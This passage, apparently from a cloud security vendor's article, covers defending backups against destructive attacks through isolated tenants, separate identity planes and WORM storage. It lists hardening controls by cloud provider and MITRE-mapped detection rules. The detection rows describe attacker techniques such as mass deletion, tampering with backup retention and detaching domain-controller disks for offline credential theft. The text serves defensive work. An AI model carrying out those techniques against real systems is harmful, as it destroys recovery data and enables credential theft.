destructive cyberattack—whether for extortion or sabotage—is to prolong recovery and reconstitution efforts by ensuring data is irrecoverable. Modern adversaries systematically target the backup plane as part of a destructive event. If backups remain mutable or share an identity plane with the primary environment, attackers can delete or encrypt them, transforming an incident into a prolonged and chaotic recovery exercise.</span></p> <p><span style="vertical-align: baseline;">While modern-day redundancy for backups should include multiple data copies across diverse media, geographic separation can be a subverted defensive strategy if logical access is unified. To ensure resilience against destructive attacks, the secondary recovery environment should reside within a sovereign cloud tenant or isolated subscription. This environment should be governed by an independent Identity and Access Management (IAM) plane, using distinct credentials and administrative personas that share no commonality with the production environment.</span></p> <p><span style="vertical-align: baseline;">Backups within an isolated environment must be anchored by immutable storage architectures. By leveraging hardware-verified Write-Once, Read-Many (WORM) technology, the recovery plane ensures that data integrity is mathematically guaranteed. Once committed, data cannot be modified, encrypted, or deleted—even by accounts with root or global administrative privileges, until the retention period expires. This creates a definitive "fail-safe" that ensures a known-good recovery point remains accessible regardless of potential security risks in the primary environment.</span></p> <p><span style="vertical-align: baseline;">Additional defense-in-depth security architecture controls relevant to common cloud-based infrastructures are included in Table 9.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Cloud Provider</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Identity Controls</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Secrets Governance</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Network Controls</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Policy Guardrails</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Google Cloud</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://docs.cloud.google.com/iam/docs/deny-overview"><span style="text-decoration: underline; vertical-align: baseline;">IAM Deny Policies</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://cloud.google.com/security/products/secret-manager"><span style="text-decoration: underline; vertical-align: baseline;">Secret Manager</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://cloud.google.com/security/vpc-service-controls"><span style="text-decoration: underline; vertical-align: baseline;">VPC Service Controls</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://docs.cloud.google.com/resource-manager/docs/organization-policy/overview"><span style="text-decoration: underline; vertical-align: baseline;">Organization Policy Service</span></a></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Amazon Web Services</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://aws.amazon.com/iam/identity-center/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">IAM Identity Center</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://aws.amazon.com/secrets-manager/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Secrets Manager</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://aws.amazon.com/verified-access/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Verified Access</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Service Control Policies</span></a></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Microsoft Azure</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-configure" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Entra ID (PIM)</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://azure.microsoft.com/en-us/products/key-vault" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Azure Key Vault</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://azure.microsoft.com/en-us/products/virtual-network/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Azure Virtual Network</span></a></p> <p><a href="https://azure.microsoft.com/en-us/products/private-link" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Private Link</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://learn.microsoft.com/en-us/azure/governance/policy/overview" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Azure Policy</span></a></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Cloud Agnostic Security Solutions</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://www.okta.com/learn/okta-identity-cloud/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Okta</span></a></p> <p><a href="https://www.sailpoint.com/products/identity-security-cloud" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">SailPoint</span></a></p> <p><a href="https://www.pingidentity.com/en/platform/pingone-advanced-identity-cloud.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Ping Identity</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://www.hashicorp.com/en/products/vault/use-cases/secrets-management" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Hashicorp Vault</span></a><span style="vertical-align: baseline;"> </span><a href="https://docs.cyberark.com/secrets-manager-saas/latest/en/content/get%20started/key_concepts/secrets.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">CyberArk</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://help.zscaler.com/zpa/understanding-zpa-zia-and-zscaler-client-connector-clouds" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Zscaler</span></a></p> <p><a href="https://www.netskope.com/products/security-service-edge" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Netskope SSE</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://www.wiz.io/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Wiz</span></a></p> <p><a href="https://www.paloaltonetworks.com/prisma/cloud" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Palo Alto Prisma Cloud</span></a></p> <p><a href="https://orca.security/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Orca Security</span></a></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 9: Common cloud capabilities for infrastructure hardening</span></p> </div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Detection Opportunities for Protecting Cloud Infrastructure and Resources</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Use Case</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">MITRE ID</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Cloud Account Abuse</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1078/004/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1078.004 - Valid Accounts: Cloud Accounts</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor cloud audit logs for authentication from unseen source IPs, anomalous ASNs, or impossible travel patterns. </span></p> <p><span style="vertical-align: baseline;">Alert on IAM policy modifications, new role assignments, and service account key creation by accounts without prior administrative API activity.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Lateral Movement via Cloud Interfaces</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1021/007/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1021.007 - Remote Services: Cloud Services</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Detect interactive console sign-ins from IPs that previously only performed programmatic API/CLI access. Alert on cloud CLI execution from non-administrative endpoints. </span></p> <p><span style="vertical-align: baseline;">Monitor for cross-service lateral movement where a single identity authenticates to multiple cloud services in a compressed timeframe outside its historical access pattern.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Modify Cloud Compute Configurations</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1578/005/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1578.005 - Modify Cloud Compute Configurations</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor for unauthorized compute changes including bulk instance creation or deletion deviating from change management baselines. </span></p> <p><span style="vertical-align: baseline;">Alert on snapshot creation of production volumes by non-backup accounts, disk detach/reattach targeting domain controller or database instances for offline credential theft, and network/firewall modifications exposing internal services to public access.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Cloud Log Enumeration</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1654/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1654 - Log Enumeration</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor for API calls listing or accessing logging configurations from identities without documented operational need. </span></p> <p><span style="vertical-align: baseline;">Alert on enumeration of SIEM integration settings, log export destinations, and alert rule definitions.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Mass Deletion &amp; Impact</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1490/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1490 - Inhibit System Recovery</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Alert when bulk delete API calls exceed baseline thresholds targeting compute instances, storage, databases, or virtual networks. </span></p> <p><span style="vertical-align: baseline;">Detect deletion or retention reduction of recovery-critical resources including backup vaults, snapshot schedules, and disaster recovery configurations.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Backup Policy Modification or Deletion</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1490/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1490 - Inhibit System Recovery</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor for unauthorized modifications to backup configurations, including changes to WORM retention policies, backup vault access policies, snapshot deletion, or backup schedule disablement. </span></p> <p><span style="vertical-align: baseline;">Alert on backup storage account access from identities other than designated backup service accounts.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Conditional Access or Security Policy Modification</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1556/009/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1556.009 - Conditional Access Policies</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor cloud identity provider audit logs for modifications to Conditional Access Policies, MFA enforcement rules, legacy authentication blocking rules, or PIM/JIT role settings. Alert on changes that add location or device exclusions to MFA policies, disable legacy protocol blocks, extend privilege role activation durations, or register new authentication methods on privileged accounts.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: 